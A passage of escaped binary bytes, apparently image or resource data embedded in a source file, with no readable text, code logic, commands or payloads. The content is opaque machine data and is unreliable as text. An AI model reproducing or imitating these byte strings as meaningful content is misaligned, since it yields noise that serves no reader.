a\\xaa\\xd8\\x9e={XX\\\nX\\x18\\xb3\\xb1\\xb1\\x91<^\\xb3f\\xcd\\xd8'\\x9f|\\xc2\\\n\\xf2\\xf2\\xf2\\xb8\\x9c\\xb3\\xbaprrB\\x1dk\\xe3\\xc6\\x8d\\\n\\xb9\\xe9\\xae\\xaa\\xaab\\xdb\\xb6mc\\xfd\\xfa\\xf5\\xe3v\\x9d\\\nu\\xe9\\xd2\\x85m\\xdd\\xba\\xb5\\xd6\\xe7\\x91\\x1cF\\x8d\\x1a\\x85\\\n\\xb2\\xe3\\x87\\x1f~xL^\\xa3\\xd1\\xb0\\xb5k\\xd72\\x0f\\\n\\x0f\\x0f\\xf2\\xb1\\xd9\\xd8\\xd8\\xb0\\x8f>\\xfa\\x88\\x95\\x97\\x97s\\\n=6\\xb9dff\\xb2w\\xdey\\x07}-\\xd5\\xb5\\x99\\\n\\x9b\\x9b\\xb3\\xe7\\x9f\\x7f\\x9e\\xa5\\xa4\\xa4(n\\x7f\\xdb\\xb6m\\\nQ\\xb6=\\xfb\\xec\\xb3u\\x8eW\\x5c\\x5c\\xcc\\xd6\\xacY\\xc3\\\n\\xbau\\xeb\\xa6w\\xac\\x8f?\\xfe\\xf8\\x09y\\xd9\\x0e\\xed\\xb8\\\nq\\xe3H'\\x5c\\xe9\\x87\\xad\\x92\\\n\\x9d\\xdb\\x058q\\xe2\\xc4'\\xceG\\xa3F\\x8dPcx\\\nyyq9\\xb6\\xbd{\\xf7\\xb2V\\xadZq;\\xb6\\x9a\\\n\\xdb\\x981c\\xd8\\xf5\\xeb\\xd7\\xd1v\\xbd\\xf5\\xd6[\\x8a\\xd9\\\nD\\xd9\\xfe\\xf5\\xaf\\x7f\\xc9:\\xcfiii,,,L\\\nQ\\x1b[\\xb7n\\xcd.\\x5c\\xb8 \\xcb\\xce\\xba\\xd8\\xb5k\\\n\\x17\\xda\\xa6\\x03\\x07\\x0e\\xd4:VNN\\x0e\\xfb\\xc7?\\xfe\\\n\\xc1,--%\\x8d\\xa3R\\xa9XQQQ\\xadc\\xcd\\\n\\x9f?\\x1fm\\xd7\\xfe\\xfd\\xfbe\\x9f\\x8fa\\xc3\\x86I\\xd6\\\ngaa!y_\\x0f\\x0f\\x0f\\xd9\\xb6edd0\\x95\\\nJ\\x85:'M\\x9b6E97\\x7f\\xfe\\xf9'\\xfa\\xbc\\\n\\xbf\\xf5\\xd6[\\x8f\\x8d\\xa1\\xd1h\\xd8\\xaf\\xbf\\xfe\\xca\\xda\\xb5\\\nk'\\xeb\\xdawuue?\\xfd\\xf4\\x93\\xec\\xf3\\xa6\\x8b\\\n\\xcc\\xccL\\xb4M}\\xfa\\xf4\\xe1\\xa2\\xfb\\xf4\\xe9\\xd3\\xac{\\\n\\xf7\\xee\\x8a\\xcd\\x1b}\\xfb\\xf6eg\\xce\\x9c\\xe1b+c\\\n\\x0c\\xfd<\\xd9\\xb6m\\xdb#\\xd9\\xec\\xecl6t\\xe8P\\\nn\\xc7\\xd6\\xaf_?\\x96\\x9d\\x9d\\xcd\\xed\\xd8\\xa8TVV\\\n\\xb2\\x7f\\xff\\xfb\\xdf\\xcc\\xde\\xde^\\xb1\\xdf\\xd1\\xce\\xce\\x8e\\xad\\\n^\\xbdZ\\xb1c\\xa8\\xaa\\xaaB\\xbdl\\x02\\x00\\x9b9s\\\n\\xa6\\xce\\xb1\\xd6\\xae]\\xcb\\xbc\\xbd\\xbd%\\x8f\\xb5~\\xfd\\xfa\\\n'\\xc6\\x91\\xed\\xd0\\x06\\x05\\x05\\xa1O\\xb4\\xbf\\xbf\\xbf\\x5c\\xb5\\\nF\\xe3\\xf4\\xe9\\xd3\\xacI\\x93&\\xdc/\\xbe\\x91#G>\\\nz{\\xbc\\x7f\\xff>Z\\xfe\\x99g\\x9e\\x91u\\x5c\\xa5\\xa5\\\n\\xa5l\\xe6\\xcc\\x99\\x8a\\xdd\\x5c\\xd57GGG\\xb6s\\xe7\\\nN\\x94}\\xd8\\xb7|\\xa5\\xb7\\xdf~\\xfb\\x8d|\\xae\\xb7o\\\n\\xdf\\xce\\x9c\\x9d\\x9d\\x0db\\xa7\\x9d\\x9d\\x1d\\xdb\\xb5k\\x17\\xd9\\\n\\xd6\\xba\\xf8\\xea\\xab\\xaf\\xd0\\xf6\\xdc\\xbau\\xeb\\x89q\\xc2\\xc3\\\n\\xc3\\x99\\xab\\xab+j\\x1cOOO\\x9dv}\\xf0\\xc1\\x07\\\nh\\xbb\\x22##e\\x9d\\x8b\\xe2\\xe2b\\xd4\\xe4\\x8eqH\\\n\\x9c\\x9d\\x9de\\xd9\\xc6\\x18c\\x11\\x11\\x11\\xe8s\\xf2\\xc6\\x1b\\\no\\xa0t|\\xf3\\xcd7h\\x1d\\xd5#\\xf6\\xb7o\\xdff\\\n\\x03\\x07\\x0e\\xe4z\\xfd\\x8f\\x1f?\\x9e\\x15\\x16\\x16\\xca>\\x7f\\\n5\\x89\\x8d\\x8dE\\xdb\\xf2\\xd2K/\\xc9\\xd2\\xa9V\\xab\\xd9\\\n\\xc7\\x1f\\x7f\\xcc\\xf5k\\x8e\\xae\\xcd\\xd2\\xd2\\x92}\\xf7\\xddw\\\n\\xb2\\xcfSee\\xa5\\xe4\\x97T\\xed\\x16\\x13\\x13\\xc3\\x18c\\\n\\xec\\xca\\x95+\\xacY\\xb3f\\xdc\\x8f\\xadU\\xabV,+\\\n+K\\xf6\\xb1Q\\xb9u\\xeb\\x16\\xeb\\xda\\xb5\\xab\\xe2\\xbf\\xa1\\\nv{\\xed\\xb5\\xd7XUU\\x15\\xf7\\xe3HIIA\\xdb\\\n\\xb2b\\xc5\\x8a'\\xc6\\xb9r\\xe5\\x0a\\xe9\\xeb\\xd1_\\x7f\\xfd\\\n\\xf5\\xc4X\\xb2\\x1cZ\\x8dF\\xc3\\xec\\xec\\xec\\xd0\\x86\\x0c\\x19\\\n2D\\x8eZ\\xa3\\xb1y\\xf3ffkk\\xab\\xd8\\x85\\xa7\\\n}\\x80\\xc4\\xc5\\xc5\\xa1e\\xa7O\\x9fN>\\xae\\xf4\\xf4t\\\n\\xd6\\xb9sg\\x83\\xdd`\\x00\\x0f#l\\xcb\\x97/\\x97l\\\nc``\\xa0A\\xed\\xd3\\xb7\\xc5\\xc5\\xc5\\xa1\\xcf\\xb3F\\xa3\\\na\\x8b\\x16-BG\\xca\\xe4nVVV\\xec\\xcf?\\xff\\\nD\\xdb\\xab\\x8f\\xd9\\xb3g\\xa3\\xedP\\xab\\xd5\\x8f\\xe4\\xcb\\xcb\\\n\\xcb\\xd9\\xdc\\xb9sI\\xc7\\xd4\\xabW/\\x9dv}\\xf1\\xc5\\\n\\x17\\xe8\\xf1\\xb0/X5\\xd9\\xbbw/J\\xdf\\xdbo\\xbf\\\n-y_{{{Y\\xb61\\xc6\\xd8\\xd4\\xa9S\\xd1\\xe7\\\n\\xe4\\xc8\\x91#(\\x1d\\x94\\xc8\\xb86b\\x1f\\x15\\x15\\x85\\xfe\\\n*%u\\x1b:t(\\xf7O\\xcd\\x94\\x17\\x84%K\\x96\\\n\\x90\\xf5\\x15\\x16\\x16\\xa2\\xbe\\x00\\xf0\\xda^\\x7f\\xfduY)\\\n\\x087o\\xdeD\\xeb\\xbcz\\xf5*\\xbbt\\xe9\\x12k\\xdc\\\n\\xb8\\xb1b\\xc7\\xd5\\xb3gOV\\x5c\\x5cL>.*\\x87\\\n\\x0e\\x1db...\\x06\\xff\\x1duEF\\xe5\\x10\\x1d\\x1d\\\n\\x8d\\xb6c\\xc7\\x8e\\x1d\\x8f\\x8d\\xb1}\\xfbv\\xe6\\xe8\\xe8H\\\n:\\xa6\\xbbw\\xef>a\\x93,\\x87655\\x95d\\xc8\\\n\\xec\\xd9\\xb3\\xe5\\xa85\\x0a\\xeb\\xd6\\xadS\\xfc\\xcdX\\xa5R\\\n\\xb1\\xc8\\xc8H\\xb6i\\xd3&\\xb4\\xec\\xd2\\xa5KI\\xc7\\x95\\\n\\x9a\\x9a\\xcaZ\\xb7nm\\xf0\\x1bL\\xbbI\\xf9,XQ\\\nQ\\x81~\\xcbWz\\xc3\\xe6\\xe8UUU\\xa1\\x1d@\\x9e\\\n\\x9b\\xa3\\xa3#\\xbbr\\xe5\\x0a\\xe9\\x1a\\xd1\\xc5\\x90!CP\\\n6\\xb4n\\xdd\\xfa\\x91lQQ\\x11\\x1b0`\\x00\\xf9x\\\n\\xa6N\\x9d\\xaa\\xd3\\xae\\x9f~\\xfa\\x09=\\xde\\x96-[d\\\n\\x9d\\x8b7\\xdf|\\x13\\xa5o\\xe7\\xce\\x9d\\x92\\xf7\\xb5\\xb2\\xb2\\\n\\x92e[UU\\x15:\\xff\\xb0q\\xe3\\xc6\\x8f\\xbd|H\\\na\\xc4\\x88\\x11\\xe8\\xf3~\\xeb\\xd6-\\x16\\x11\\x11\\xa1\\xf8\\xfd\\\n\\xfd\\xca+\\xaf\\xc8:\\x875\\xf9\\xf8\\xe3\\x8f\\xd16P\\xbf\\\n\\xea\\xe4\\xe7\\xe7\\xcbZ\\xab!w[\\xb8p!\\xf9<\\xed\\\n\\xdb\\xb7\\x0f\\xad\\xef\\xef\\xbf\\xffV\\xe4+h\\xcd\\xcd\\xd0~\\\nHdd$\\xfa\\x13=\\xcf\\xed\\xab\\xaf\\xbe\\xe2z<\\xff\\\n\\xfd\\xef\\x7f\\xd16\\x5c\\xbcx\\xf1\\x91\\xfc\\xf2\\xe5\\xcb\\xc9\\xc1\\\n\\x1dkk\\xebZ\\xa3\\xce\\xb2\\x1c\\xda\\x98\\x98\\x18\\x921_\\\n~\\xf9\\xa5\\x1c\\xb5\\x06g\\xc3\\x86\\x0d\\x06\\xf9\\xcc\\x03\\x00\\xac\\\ne\\xcb\\x96\\xec_\\xff\\xfa\\x17Zn\\xd3\\xa6M\\xe8\\xe3*\\\n,,d\\xed\\xdb\\xb77\\xda\\x0d\\x06\\xf00\\x9fz\\xef\\xde\\\n\\xbdu\\xday\\xed\\xda5\\xa3\\xdaXs\\xab\\xebswm\\\n\\xa8\\xd5j\\xae9\\xd7\\xd4\\xadC\\x87\\x0e\\x5c#U\\xcd\\x9b\\\n7G\\xe9\\xd7.\\x00*--e\\x83\\x07\\x0f\\x96u,\\\n\\x1f|\\xf0\\x81N\\xbb6n\\xdc\\x88\\x1e\\xef\\xd7_\\x7f\\x95\\\nu.0/\\x85\\x81\\x81\\x81\\xec\\xc4\\x89\\x13\\x92\\xf7W\\xa9\\\nT\\xb2l\\xa3|\\xf1\\x995k\\x16ZO\\xcb\\x96-Q\\\n:\\xac\\xac\\xac\\xd8\\xb6m\\xdb\\x98\\xb9\\xb9\\xb9A\\xae\\x7f]\\\n\\xf9\\xdb\\x14(\\x11\\xef\\xd3\\xa7O\\xa3\\xf5TVV\\xca\\xbe\\\nWxl\\xd4|\\xe4\\xef\\xbe\\xfb\\x0e\\xa5G\\xa5RIZ\\\n\\x10\\xc4cS\\xa9T\\x5c\\x16\\x83Ja\\xdb\\xb6mF\\x0f\\\n\\xcaXXX\\xb0s\\xe7\\xceq;\\xa6\\x85\\x0b\\x17\\xa2\\xcf\\\n\\xb76*\\xfe\\xf5\\xd7_\\xcb:\\x96V\\xadZ\\xd5j\\x93\\\n,\\x87v\\xcd\\x9a5$c~\\xff\\xfdw9j\\x0dJ\\\nLL\\x8c\\xc1/D\\xca\\xa77l\\x12\\xbfF\\xa3a\\xcf\\\n=\\xf7\\x9cQo0\\xed\\xd6\\xa4I\\x13\\x96\\x9b\\x9b\\xab\\xd3\\\n\\xd6\\xc8\\xc8H\\xa3\\xdbX}\\xc3\\xe6+\\xcf\\x981\\xc3\\xe8\\\n6k\\xb7\\xcf>\\xfb\\x0ce\\xbb.\\xca\\xcb\\xcb\\xd1\\x8e\\xc8\\\n[o\\xbd\\xc5\\xaa\\xaa\\xaa\\xd8\\xe8\\xd1\\xa3e\\x1f\\xc7\\x9a5\\\nkt\\xdaFY\\x9c\\xb4n\\xdd:\\xf2\\xb9HJJB\\\n\\xe9\\x9a;w.\\xfas]ee%\\xd9\\xbe\\xa5K\\x97\\\n\\xa2\\xcf\\xc7\\xbe}\\xfbP:***P\\x0b\\xdd\\x00\\x80\\\n\\xd9\\xda\\xda\\x1a4b\\xd5\\xb2eKt\\xd4Y\\x17=z\\\n\\xf4@\\xeb\\xcf\\xc9\\xc9A\\xeb\\xa1V\\x11\\xe2\\xbd\\xd9\\xdb\\xdb\\\n\\xb3\\x9b7o\\xa2\\xed\\xc7~\\xb90\\xf4\\xd6\\xb6m[n\\\n\\xd7\\x84.v\\xef\\xdem\\xb0\\x976}[\\xe7\\xce\\x9d\\xb9\\\n\\xe5\\xd3N\\x980\\x01\\xa5\\xdb\\xc7\\xc7\\x871\\xf6\\xd0o\\x94\\\n\\x9bv7b\\xc4\\x88Zm\\x92U\\x10\\x8fZ\\x83\\xb6\\xbe\\\nt\\x86INN\\x86\\xb0\\xb00\\xee\\xad,\\xf5\\x81-~\\\n\\x0e\\x80?\\xa7[\\xb7n\\x85\\xed\\xdb\\xb7\\xa3\\xf5(AZ\\\nZ\\x1a,X\\xb0@\\xe7\\xdf)\\xdd\\x87\\x94\\x04\\xd3]\\xec\\\n\\xc7\\x1f\\x7f\\x84\\xf5\\xeb\\xd7+g\\x0c\\x92/\\xbe\\xf8\\x02\\xee\\\n\\xdf\\xbf/{\\x9c\\xa4\\xa4$\\xa8\\xaa\\xaaB\\xc9\\xb4l\\xd9\\\n\\x12\\x96-[\\x06\\x7f\\xfe\\xf9\\xa7l\\xfdu\\xd5Y4t\\\n\\xeb[l3\\x85\\xa1C\\x87BYY\\x19JF\\x8e}\\\n\\xd8\\xfa\\xb3\\xce\\xce\\xce0h\\xd0 \\x94LJJ\\x0a\\xba\\\n\\x96oii)\\xfa<\\xc8\\xe1\\xe6\\xcd\\x9b\\xb0k\\xd7.\\\nncapuuE\\xd7\\x08?}\\xfa4\\xac\\x5c\\xb9\\\n\\x12%\\xa3\\x14\\xc5\\xc5\\xc5O\\xd6\\xfc\\x94\\x80\\xa9\\xcd\\xdd5\\\nIHHxT\\xb3V\\x09n\\xdc\\xb8\\x01\\xd3\\xa6MC\\\n\\xcf\\x95Jq\\xfe\\xfcy\\xd8\\xb8q#\\x97\\xb1\\xb0\\xf7@\\\n`` \\x5c\\xb8p\\x01\\xe6\\xcd\\x9b\\x87\\xae\\xb3^\\x13]\\\n\\xf3\\xbf\\xc1\\x1dZ\\x95JU/\\x9a*\\xa8\\xd5j\\x984\\\ni\\x12dgg\\x1b\\xdb\\x14\\xbd\\xb8\\xbb\\xbb\\xa3\\xba#\\x95\\\n\\x95\\x95\\xc1\\xa2E\\x8b\\x14\\xb4\\x08Oxx\\xb8\\xce\\xc6\\x0d\\\n\\xd7\\xaf_7\\xb05u#\\xd5\\xa1=u\\xea\\x14\\xbc\\xfd\\\n\\xf6\\xdb\\x0a[\\x83\\xa3\\xb0\\xb0\\x10\\xfe\\xf3\\x9f\\xff\\xc8\\x1e\\x87\\\nr\\xef\\xa7\\xa7\\xa7\\xc3\\x92%Kd\\xeb\\x06\\x80:\\x8b\\xa4\\\n\\x1b\\xba\\xf5-\\xc6a\\xb4\\xb0\\xb0\\x80\\x81\\x03\\x07\\xa2\\x1d9\\\nj\\xe3\\x87\\xbc\\xbc<8}\\xfa4Jf\\xcc\\x981`\\\nee\\x85\\x92\\xa1\\x067\\x0c\\xcd7\\xdf|#{\\x8c\\x07\\\n\\x0f\\x1e\\xc0\\x83\\x07\\x0fP2\\xd8\\x80\\x03c\\x0c\\xdey\\xe7\\\n\\x1d\\xd9\\x0f~\\x9e\\xc4\\xc4\\xc4\\xa0\\x9b\\xd7\\xd4\\x87\\xebb\\xd9\\\n\\xb2e\\x8a\\x9c\\xe7\\x92\\x92\\x12\\x988q\\x22)@\\xa5$\\\n<\\x8e\\x971\\x86n\\xfc\\xe4\\xe5\\xe5\\x05\\x93'O\\xe6\\xf2\\\n\\x12\\xabk\\xfe\\x97\\xe5\\xd0R\\xda\\xde\\xfa\\xf8\\xf8\\x80\\xad\\xad\\\n\\xad\\x1c\\xb5\\x06a\\xf9\\xf2\\xe5p\\xe6\\xcc\\x19c\\x9b!\\x09\\\n\\xecd\\x19\\x1e\\x1e\\x0e\\xc9\\xc9\\xc9\\xb2tZZZB\\xcf\\\n\\x9e=a\\xca\\x94)0c\\xc6\\x0c\\x08\\x09\\x09\\x0177\\\n7\\xf2xUUU\\xf0\\xed\\xb7\\xdf\\xd6\\xfa7Ssh\\\n\\x03\\x03\\x03\\xf5\\xee\\x93\\x93\\x93\\x03aaa\\xdcZ\\xaa\\xf2\\\n\\xe4\\x7f\\xff\\xfb\\x9fl\\xbb(\\xf7\\xfe\\xca\\x95+\\xb9D*\\\n,--\\xa1i\\xd3\\xa6:\\xffN\\x89\\xd0R\\x1d\\xc6\\xca\\\n\\xcaJ8|\\xf8\\xb0\\xe4\\xfd{\\xf6\\xec\\x09\\x8d\\x1a52\\\nX\\x84\\xf6\\xd0\\xa1C\\xe8c\\xc3t\\x07\\xd3R\\x1f\\x1c\\x17\\\n\\x00\\x80\\xd8\\xd8X\\xd9A\\x0a\\xca\\xb1b\\xe7\\xe8\\xa8\\xa8(\\\n8q\\xe2\\x04ZOu\\xcc\\xcd\\xcd!88\\x18&O\\\n\\x9e\\x0c\\xaf\\xbc\\xf2\\x0a\\x8c\\x1e=\\xba\\xce\\xfbF\\x0a_\\x7f\\\n\\xfd\\xb5\\xe4}\\xd5j5$%%\\xc9\\xd2g\\x08\\xae^\\\n\\xbd\\x0a\\xb1\\xb1\\xb1\\xdc\\xc7\\x9d3g\\x0e\\x5c\\xbat\\x89\\xfb\\\n\\xb8rILL\\x84\\xe8\\xe8hYc\\xa4\\xa7\\xa7Cq\\\nq1Jf\\xd7\\xae]\\xdc\\x9e\\xe5\\xba\\x22\\xb4\\xb2Z\\xdf\\\n\\x1a\\xe2\\xc66\\x06\\x17.\\x5c\\x80\\xa5K\\x97\\xca\\x1a\\xc3\\xd1\\\n\\xd1\\x11&O\\x9e\\x0c]\\xbat\\x81f\\xcd\\x9aAAA\\\n\\x01\\xdc\\xb9s\\x07v\\xed\\xda\\x05\\xa7N\\x9d\\xe2d\\xe9C\\\n\\xb0\\xe7\\xf4\\xbf\\xff\\xfd/Y\\x97\\xa7\\xa7',^\\xbc\\x18\\\n\\xa6M\\x9b\\xf6DTX\\xadV\\xc3\\x81\\x03\\x07`\\xd1\\xa2\\\nE\\xe8\\x16\\x8c\\x00\\x00k\\xd7\\xae\\x85\\x7f\\xff\\xfb\\xdfOD\\\n\\x87L\\xed\\xb3\\x95\\x94\\x08\\xed\\xe2\\xc5\\x8b!55\\x95\\xac\\\n\\xc3\\xc2\\xc2\\x02\\x86\\x0d\\x1b\\x06\\xa3F\\x8d\\x82\\xe0\\xe0`\\xf0\\\n\\xf0\\xf0\\x80\\xf2\\xf2r\\xb8{\\xf7.DEE\\xc1\\xc6\\x8d\\\n\\x1b!++\\x8b4vff&\\xec\\xdf\\xbf\\x1f\\xc6\\x8e\\\n\\x1dK\\xb6\\x8fr\\xef\\xf3\\xfa\\xbc\\xdc\\xacY\\xb3:\\xdb\\xa5\\\n\\x1a2\\xe5\\xe0\\xc4\\x89\\x13PPP y\\xffQ\\xa3F\\\n\\x01\\x00\\xa0\\xdb\\xb3R\\xed\\xc3\\xa6C\\xd8\\xdb\\xdb\\xc3\\xf0\\xe1\\\n\\xc3\\xd1z\\x94\\xbaG---\\xc1\\xd2\\xd2\\x12JJJ\\\n\\xb8\\x8c\\xc7\\x18\\x83#G\\x8e\\xc0\\xa4I\\x93\\xc8c\\x18\\xe2\\\n\\xb9\\xf7\\xf3\\xcf?\\xa3uhqrr\\x82w\\xdf}\\x17\\\nf\\xce\\x9c\\x09\\xde\\xde\\xde\\x8f\\xfd\\x8d1\\x06\\xb1\\xb1\\xb1\\xb0\\\nx\\xf1b8v\\xec\\x18z\\xec={\\xf6@jj\\xaa\\\n$\\xc78%%\\x85k\\xba\\x9e\\x93\\x93\\x13\\x8c\\x193\\x06\\\nF\\x8e\\x1c\\x09~~~\\xe0\\xe1\\xe1\\x01YYY\\x90\\x98\\\n\\x98\\x08k\\xd7\\xae\\x85\\x93'O\\x92\\xc7^\\xbf~=<\\\n\\xf3\\xcc3\\xdcl=t\\xe8\\x10DDD\\xc8\\x1a#(\\\n(\\x08\\x9e{\\xee9\\xe8\\xd5\\xab\\x174m\\xda\\x14\\xcc\\xcd\\\n\\xcd!++\\x0b\\xce\\x9e=\\x0b\\xbf\\xfd\\xf6\\x1b\\xc4\\xc7\\xc7\\\n\\x93\\xc7\\x0e\\x0f\\x0f\\x87!C\\x86\\x90\\xe5)\\x01\\x0d\\x9e\\xe9\\\nE:\\xbf\\xd0Q\\x13\\x82\\xb3\\xb2\\xb2H\\xc9\\xbc\\xaf\\xbe\\xfa\\\n*U\\xa5\\xc1\\x90SN\\xc8\\xcc\\xcc\\x8c-Z\\xb4\\xa8\\xce\\\n6\\xb4g\\xce\\x9c\\xe1\\xda\\x8d\\xeb\\x93O>\\x91|l\\xf1\\\n\\xf1\\xf1d=\\xc3\\x86\\x0dc\\xf9\\xf9\\xf9zuTVV\\\n\\x92KT\\x1d;v\\xec\\x89\\xf1\\xce\\x9d;\\xc7\\xce\\x9e=\\\n\\xabs[\\xb0`\\x01J\\x87\\x87\\x87G\\x9d\\xe3\\xe9\\xdb\\xf4\\\n-\\xd09{\\xf6\\xac\\xac\\xaa\\x18\\xa1\\xa1\\xa1z\\xbb\\xa9=\\\nx\\xf0\\x80M\\x9a4\\x89\\xacc\\xc6\\x8c\\x19z\\x7f\\xc7\\xba\\\n\\x08\\x09\\x09\\xe1v\\xfd\\xea\\xda\\xfc\\xfd\\xfd\\xd9\\xa4I\\x93\\xd8\\\n?\\xff\\xf9O\\xb6b\\xc5\\x0a\\xb6b\\xc5\\x0a\\xb6t\\xe9R\\\n\\xbd\\xeds\\xd5j5z\\xd1\\x01\\xa6&ru\\xde\\x7f\\xff\\\n}\\x94\\x9e\\xbf\\xff\\xfe\\x9b1\\xf6\\xb0\\xfe\\x22F\\xae\\xb6\\x9a\\\n\\x8bR\\xf0\\xf5\\xf5E\\xe9\\x09\\x0b\\x0b#\\xe9\\x199r$\\\n\\x97\\xdf\\xdc\\xc6\\xc6\\x86M\\x9f>\\x9dEFF\\xb2\\x8c\\x8c\\\n\\x8cG\\xe3\\xe7\\xe6\\xe6\\xb2C\\x87\\x0e\\xb1\\xa9S\\xa7\\xca\\xae\\\n83w\\xee\\x5c\\xd21jY\\xb2d\\x09ZgDD\\\n\\x84\\xe4\\xf1\\xb3\\xb3\\xb3\\xc9\\x0b\\x91;u\\xea\\xc4\\xee\\xdd\\xbb\\\n\\xa7W\\x87F\\xa3a\\xcb\\x96-#-\\xce\\x91z,\\x94\\\n\\x92]\\xb5mVVVl\\xe1\\xc2\\x85z\\x9f=\\x9b7\\\no&/2l\\xd4\\xa8\\x91\\xac\\x85\\x97\\xd5\\xa9\\xa8\\xa8@\\\n\\xb7\\x84\\xad\\xbe\\x05\\x04\\x04\\xb0?\\xfe\\xf8\\xa3N\\x1d\\x1a\\x8d\\\n\\x86\\xfd\\xf0\\xc3\\x0f\\xcc\\xca\\xca\\x8a\\xa4\\xc3\\xc5\\xc5\\x85UT\\\nT\\x90\\x8fq\\xed\\xda\\xb5\\x5c~[}\\xbf\\xc9\\xd0\\xa1C\\\n\\xd9\\x1bo\\xbc\\xc1\\x96-[\\xf6\\xe8\\x19\\xf0\\xee\\xbb\\xef\\xea\\\n\\xbc\\x16\\xc8\\x0e-\\xa6\\xecL\\xf5\\x8d\\xfa\\xe00\\x14\\xbbw\\\n\\xef&\\xff\\x00\\x8e\\x8e\\x8e\\xec\\xd0\\xa1C\\x92\\xf4\\xe4\\xe7\\xe7\\\n\\xb3\\xfe\\xfd\\xfbs\\xf9\\xe11%\\x87>\\xff\\xfcs\\x92\\x8e\\\n\\xe0\\xe0`t\\xbb\\xe2y\\xf3\\xe6\\xa1\\xf5PV\\xe1c\\x0b\\\n\\xba\\xf7\\xeb\\xd7\\x0f\\xadC*\\x1a\\x8d\\x86\\xf5\\xee\\xdd\\x9bt\\\n\\x8e\\xcd\\xcd\\xcdQ\\xe5q\\xd4j5\\xd9\\x91\\x90\\xdb*Y\\\n\\xa9F\\x17-[\\xb6d_|\\xf1\\x05\\xbb}\\xfb\\xb6,\\\n\\xfb\\xb0\\xc5\\xba?\\xfd\\xf4S\\x92\\x1eLC\\x12??\\xbf\\\nGr\\xd8y\\x86r>._\\xbe\\x8c>\\xff\\x94\\xf2\\x7f\\\n\\x8c\\xe1\\xdb\\x9b\\xd6\\xb6\\x8d\\x181B\\xd2J\\xfa\\xbd{\\xf7\\\n\\xca\\xea\\xb4\\x17\\x12\\x12B:F-/\\xbd\\xf4\\x12Z\\xe7\\\n\\x89\\x13'$\\x8f\\xbfy\\xf3f\\xd2qy{{\\xa3+\\\n)\\xac\\x5c\\xb9\\x12\\xadGjM\\xdfo\\xbf\\xfdV\\xf65\\\n\\xe1\\xe5\\xe5\\xc5\\xce\\x9e=+\\xf9x\\xf6\\xec\\xd9C\\xd6u\\\n\\xfc\\xf8q\\xd4\\xb9\\xd3\\x05\\xe5\\x9cj\\xb7\\xf1\\xe3\\xc7\\xd7\\x19\\\n\\x0c\\xab\\xc9/\\xbf\\xfcB\\xd6u\\xf4\\xe8Q\\xf21.^\\\n\\xbcX\\xf6o[\\xdb\\xe6\\xe0\\xe0\\xc0\\xe6\\xce\\x9d\\xcb\\x8e\\x1e\\\n=J\\xaa\\xc6@vh)\\x9dR\\x00\\x1e\\xef\\xd3lj\\\n\\xa8\\xd5j\\xf2\\x9b\\x95\\x95\\x95\\x15;x\\xf0 J_F\\\nF\\x06\\xf3\\xf1\\xf1\\x91}\\x11\\x9c:uJ\\xb2NjM\\\n\\xc3\\x93'ObO'+++c\\x9d:uB\\xe9\\\n\\x193f\\x0cZ\\x0f\\xb6\\xc0\\xbf\\x92_\\x09~\\xfd\\xf5W\\\n\\xd2\\xf9533c[\\xb7nE\\xeb\\xbb\\x7f\\xff>\\xf9\\\n\\xe1\\xae/\\x0a\\xac\\x0bJ;K}\\x9b\\xbf\\xbf?\\xdb\\xb4\\\ni\\x13\\xb7\\x922\\xd8\\xfb\\xea\\xa3\\x8f>B\\xeb\\xc8\\xc8\\xc8\\\n@E\\xb8\\xe6\\xcd\\x9b\\xf7H\\x16\\xdbY\\xec\\xda\\xb5kh\\\n\\xfb\\xb0\\x0fV\\x1b\\x1b\\x1b\\xd4\\xc3T\\x8bZ\\xad&G\\x8a\\\n\\xb4\\xdb\\x9c9sP\\xbf\\xfd\\x8e\\x1d;\\xc8\\xba\\x82\\x83\\x83\\\n\\xd1\\xc7X\\x1d\\xca\\x0b+\\xa6\\xd5\\xea\\xacY\\xb3H\\xc7\\xb5\\\nq\\xe3F\\xf4\\xb1h4\\x1at\\x19\\xbd\\xf6\\xed\\xdbK\\x1a\\\n\\xfb\\x1f\\xff\\xf8\\x87\\xack\\x22 \\x80\\xf4\\x227m\\xda\\\n4\\x92>\\xcc\\x97N]dee1'''\\x92\\xfe\\\n\\xa9S\\xa7\\x92J\\x88a\\xcbgi\\xb7e\\xcb\\x96\\x91\\x8f\\\nS\\xce\\xd7\\xc1\\xda6\\x1b\\x1b\\x1b\\xf6\\xfe\\xfb\\xef\\x93J\\xdb\\\nU\\x87\\xec\\xd0R\\x8a\\xff\\x03\\x00;\\x7f\\xfe\\xbc,\\x83\\x95\\\n\\x04\\xfb\\x19\\xb0\\xfa\\xb6z\\xf5j\\x92\\xce?\\xfe\\xf8C\\xf6\\\n\\xc5p\\xff\\xfe}I\\xba\\xd4j5\\xa9Uq]mF\\\n\\xf5\\x81u\\xf0\\xbat\\xe9\\x82\\xd6\\xd1\\xb4iS\\x94\\x8e/\\\n\\xbe\\xf8\\x82|\\xb6\\xd2\\xd2R\\xd4\\xe7\\xdf&M\\x9a\\xa0\\xc6/,\\\n,D\\xe7\\x81)\\xd5\\xd8\\xe3\\xe0\\xc1\\x83\\xa4\\xf3;|\\xf8\\\npY\\xd7\\xcf\\xfd\\xfb\\xf7I\\x112jD\\xe2\\xc0\\x81\\x03\\\n\\x5c&\\xb2F\\x8d\\x1a\\xb1={\\xf6\\x90\\x8f\\xbb.z\\xf5\\\n\\xea\\x85\\xb2e\\xc1\\x82\\x05h\\x1d\\x98nQ\\x0e\\x0e\\x0e\\xac\\\n\\xb4\\xb4\\xf4\\x91,\\xb6\\xcb\\x226\\x10P\\x5c\\x5c\\x8c\\xce'\\\n\\xa46\\x97\\x90s=\\xb4k\\xd7\\xeeQ\\xf7 ,\\xd4(\\\n\\xad\\x93\\x93\\x13I\\x1fc\\x8c\\xe5\\xe5\\xe5\\xa1\\xf5a^\\xd2\\\nKKKI\\xce\\xc9?\\xfe\\xf1\\x0f\\xf211\\x86\\xebt\\\n\\x07\\x00\\x8f]\\xcb\\xba\\xa0\\xa6%\\xa9T*\\xd9]\\xdd(\\\nM\\x83\\xdc\\xdc\\xdcd\\xe9,++c\\x9e\\x9e\\x9eh\\xbd\\\n\\x8d\\x1a5b)))\\xb2tS\\xdaNK\\x8d\\xb4\\xd7\\\n\\x06\\xa5\\xf9Sm\\xdb\\x82\\x05\\x0b\\xb8\\xe5.3&\\xa3\\xb1\\\n\\x02e\\xa5\\xa7\\x97\\x97\\x178::RU*\\xca\\xb1c\\\n\\xc7\\xd0\\xf5\\x1a\\x01\\x1e\\xae\\x0a\\xfe\\xdf\\xff\\xfe\\x87^\\xb5\\x5c\\\n\\x9dw\\xdf}\\x97,\\x8bY=K-!\\x